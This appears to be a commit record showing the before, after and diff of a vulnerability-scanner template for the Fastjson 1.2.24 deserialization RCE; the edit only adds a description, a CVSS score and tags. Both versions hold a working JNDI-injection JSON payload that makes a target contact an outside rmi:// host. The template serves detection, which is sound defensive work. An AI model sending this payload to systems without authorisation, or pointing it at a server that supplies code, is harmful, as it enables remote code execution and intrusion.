vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml (before)
id: fastjson-1-2-24-rce

info:
  name: Fastjson 1.2.24 Deserialization RCE
  author: zh
  severity: critical
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://github.com/wyzxxz/fastjson_rce_tool
  tags: fastjson,rce,deserialization,oast

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
                "autoCommit":true
            }
        }

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"com.sun.rowset.JdbcRowSetImpl",
           "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
           "autoCommit":true
        }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol   # Confirms DNS Interaction
        words:
          - "dns"

      - type: word
        condition: and
        words:
          - "Internal Server Error"
          - "500"

vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml (after)
id: fastjson-1-2-24-rce

info:
  name: Fastjson 1.2.24 - Remote Code Execution
  author: zh
  severity: critical
  description: Fastjson 1.2.24 is susceptible to a deserialization remote code execution vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://github.com/wyzxxz/fastjson_rce_tool
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: fastjson,rce,deserialization,oast,vulhub

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
                "autoCommit":true
            }
        }

      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
           "@type":"com.sun.rowset.JdbcRowSetImpl",
           "dataSourceName":"rmi://{{interactsh-url}}/Exploit",
           "autoCommit":true
        }

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol   # Confirms DNS Interaction
        words:
          - "dns"

      - type: word
        condition: and
        words:
          - "Internal Server Error"
          - "500"

# Enhanced by mp on 2022/05/25

vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml (diff)
@@ -1,14 +1,19 @@
 id: fastjson-1-2-24-rce
 
 info:
-  name: Fastjson 1.2.24 Deserialization RCE
+  name: Fastjson 1.2.24 - Remote Code Execution
   author: zh
   severity: critical
+  description: Fastjson 1.2.24 is susceptible to a deserialization remote code execution vulnerability.
   reference:
     - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
     - https://www.freebuf.com/vuls/208339.html
     - https://github.com/wyzxxz/fastjson_rce_tool
-  tags: fastjson,rce,deserialization,oast
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: fastjson,rce,deserialization,oast,vulhub
 
 requests:
   - raw:
@@ -49,3 +54,5 @@ requests:
         words:
           - "Internal Server Error"
           - "500"
+
+# Enhanced by mp on 2022/05/25
